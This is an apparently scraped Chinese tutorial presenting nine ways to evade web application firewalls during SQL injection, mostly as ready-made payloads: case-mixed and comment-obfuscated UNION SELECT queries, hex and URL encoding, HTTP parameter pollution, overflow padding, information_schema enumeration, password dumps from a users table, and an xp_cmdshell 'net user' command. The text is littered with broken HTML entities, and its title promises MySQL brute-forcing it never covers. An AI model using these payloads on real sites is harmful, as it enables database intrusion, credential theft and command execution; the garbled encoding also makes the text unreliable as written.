绕过防火墙爆破mysql_SQL注入绕过防火墙的9种基本方法

Web应用程序防火墙(WAF)的主要作用是过滤&＃xff0c;监控和阻止各类进出Web应用程序的HTTP流量。WAF区别于常规防火墙&＃xff0c;因为WAF能够过滤特定Web应用程序的内容&＃xff0c;而常规防火墙充当的则是服务器之间的安全门。通过检查HTTP流量&＃xff0c;它可以防止源自Web应用安全漏洞的攻击&＃xff0c;如SQL注入&＃xff0c;XSS&＃xff0c;文件包含和安全配置错误。

WAF是如何工作的&＃xff1f;

协议异常检测&＃xff1a;拒绝不符合HTTP标准的请求

增强的输入验证&＃xff1a;代理和服务器端验证&＃xff0c;而不仅仅是客户端验证

白名单和黑名单

基于规则和基于异常的保护&＃xff1a;基于规则的更依赖黑名单机制&＃xff0c;基于异常则更灵活

状态管理&＃xff1a;关注会话保护还有&＃xff1a;COOKIE保护&＃xff0c;反入侵规避技术&＃xff0c;响应监控和信息披露保护。

如何绕过WAF&＃xff1f;

1.当我们在目标URL进行SQL注入测试时&＃xff0c;可以通过修改注入语句中字母的大小写来触发WAF保护情况。如果WAF使用区分大小写的黑名单&＃xff0c;则更改大小写可能会帮我们成功绕过WAF的过滤。

http://target.com/index.php?page_id&＃61;-15 uNIoN sELecT 1,2,3,4

2.关键字替换(在关键字中间可插入将会被WAF过滤的字符) - 例如SELECT可插入变成SEL

http://target.com/index.php?page_id&＃61;-15 UNIunionON SELselectECT 1,2,3,4

3.编码

&＃43; URL encode

page.php?id&＃61;1%252f%252a*/UNION%252f%252a /SELECT

&＃43;Hex encode

target.com/index.php?page_id&＃61;-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…

SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))

&＃43;Unicode encode

?id&＃61;10%D6‘%20AND%201&＃61;2%23

SELECT &＃39;Ä&＃39;&＃61;&＃39;A&＃39;; #1

4.使用注释

在攻击字符串中插入注释。例如&＃xff0c;/*!SELECT*/ 这样WAF可能就会忽略该字符串&＃xff0c;但它仍会被传递给目标应用程序并交由mysql数据库处理。

index.php?page_id&＃61;-15 %55nION/**/%53ElecT 1,2,3,4

&＃39;union%a0select pass from users#

index.php?page_id&＃61;-15 /*!UNION*/ /*!SELECT*/ 1,2,3

?page_id&＃61;null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/&＃43;1,2,3,4…

5.某些函数或命令&＃xff0c;因为WAF的过滤机制导致我们无法使用。那么&＃xff0c;我们也可以尝试用一些等价函数来替代它们。

hex()、bin() &＃61;&＃61;> ascii()

sleep() &＃61;&＃61;>benchmark()

concat_ws()&＃61;&＃61;>group_concat()

substr((select &＃39;password&＃39;),1,1) &＃61; 0x70

strcmp(left(&＃39;password&＃39;,1), 0x69) &＃61; 1

strcmp(left(&＃39;password&＃39;,1), 0x70) &＃61; 0

strcmp(left(&＃39;password&＃39;,1), 0x71) &＃61; -1

mid()、substr() &＃61;&＃61;> substring()

&＃64;&＃64;user &＃61;&＃61;> user()

&＃64;&＃64;datadir &＃61;&＃61;> datadir()

6.使用特殊符号

这里我把非字母数字的字符都规在了特殊符号一类&＃xff0c;特殊符号有特殊的含义和用法。

&＃43; &＃96; symbol: select &＃96;version()&＃96;;

&＃43; &＃43;- :select&＃43;id-1&＃43;1.from users;

&＃43; &＃64;:select&＃64;^1.from users;

&＃43;Mysql function() as xxx

&＃43;&＃96;、~、!、&＃64;、%、()、[]、.、-、&＃43; 、|、%00

示例

‘se’&＃43;’lec’&＃43;’t’

%S%E%L%E%C%T 1

1.aspx?id&＃61;1;EXEC(‘ma’&＃43;&＃39;ster..x’&＃43;&＃39;p_cm’&＃43;&＃39;dsh’&＃43;&＃39;ell ”net user”’)

&＃39; or --&＃43;2&＃61;- -!!!&＃39;2

id&＃61;1&＃43;(UnI)(oN)&＃43;(SeL)(EcT)

7.HTTP参数控制

通过提供多个参数&＃61;相同名称的值集来混淆WAF。例如 http://example.com?id&＃61;1&?id&＃61;’ or ‘1’&＃61;’1′ — ‘在某些情况下(例如使用Apache/PHP)&＃xff0c;应用程序将仅解析最后(第二个) id&＃61; 而WAF只解析第一个。在应用程序看来这似乎是一个合法的请求&＃xff0c;因此应用程序会接收并处理这些恶意输入。如今&＃xff0c;大多数的WAF都不会受到HTTP参数污染(HPP)的影响&＃xff0c;但仍然值得一试。

&＃43; HPP(HTTP Parameter Polution))

/?id&＃61;1;select&＃43;1,2,3&＃43;from&＃43;users&＃43;where&＃43;id&＃61;1—

/?id&＃61;1;select&＃43;1&id&＃61;2,3&＃43;from&＃43;users&＃43;where&＃43;id&＃61;1—

/?id&＃61;1/**/union/*&id&＃61;*/select/*&id&＃61;*/pwd/*&id&＃61;*/from/*&id&＃61;*/users

HPP又称做重复参数污染&＃xff0c;最简单的就是?uid&＃61;1&uid&＃61;2&uid&＃61;3&＃xff0c;对于这种情况&＃xff0c;不同的Web服务器处理方式如下&＃xff1a;

&＃43;HPF (HTTP Parameter Fragment)

这种方法是HTTP分割注入&＃xff0c;同CRLF有相似之处(使用控制字符%0a、%0d等执行换行)

/?a&＃61;1&＃43;union/*&b&＃61;*/select&＃43;1,pass/*&c&＃61;*/from&＃43;users--

select * from table where a&＃61;1 union/* and b&＃61;*/select 1,pass/* limit */from users—

&＃43;HPC (HTTP Parameter Contamination)

RFC2396定义了以下字符&＃xff1a;

Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * &＃39; ()

Reserved : ; / ? : &＃64; & &＃61; &＃43; $ ,

Unwise : { } | \ ^ [ ] &＃96;

不同的Web服务器处理处理构造的特殊请求时有不同的逻辑&＃xff1a;

以魔术字符%为例&＃xff0c;Asp/Asp.net会受到影响

8.缓冲区溢出

WAF和其他所有的应用程序一样也存在着各种缺陷和漏洞。如果出现缓冲区溢出的情况&＃xff0c;那么WAF可能就会崩溃&＃xff0c;即使不能代码执行那也会使WAF无法正常运行。这样&＃xff0c;WAF的安全防护自然也就被瓦解了。

?id&＃61;1 and (select 1)&＃61;(Select 0xA*1000)&＃43;UnIoN&＃43;SeLeCT&＃43;1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

9.整合绕过

当使用单一的方式无法绕过时&＃xff0c;我们则可以灵活的将多种方式结合在一起尝试。

target.com/index.php?page_id&＃61;-15&＃43;and&＃43;(select 1)&＃61;(Select 0xAA[..(add about 1000 "A")..])&＃43;/*!uNIOn*/&＃43;/*!SeLECt*/&＃43;1,2,3,4…

id&＃61;1/*!UnIoN*/&＃43;SeLeCT&＃43;1,2,concat(/*!table_name*/)&＃43;FrOM /*information_schema*/.tables /*!WHERE */&＃43;/*!TaBlE_ScHeMa*/&＃43;like&＃43;database()– -

?id&＃61;-725&＃43;/*!UNION*/&＃43;/*!SELECT*/&＃43;1,GrOUp_COnCaT(COLUMN_NAME),3,4,5&＃43;FROM&＃43;/*!INFORMATION_SCHEM*/.COLUMNS&＃43;WHERE&＃43;TABLE_NAME&＃61;0x41646d696e--

学习完整教程&＃xff0c;请点击“阅读全文”加入学习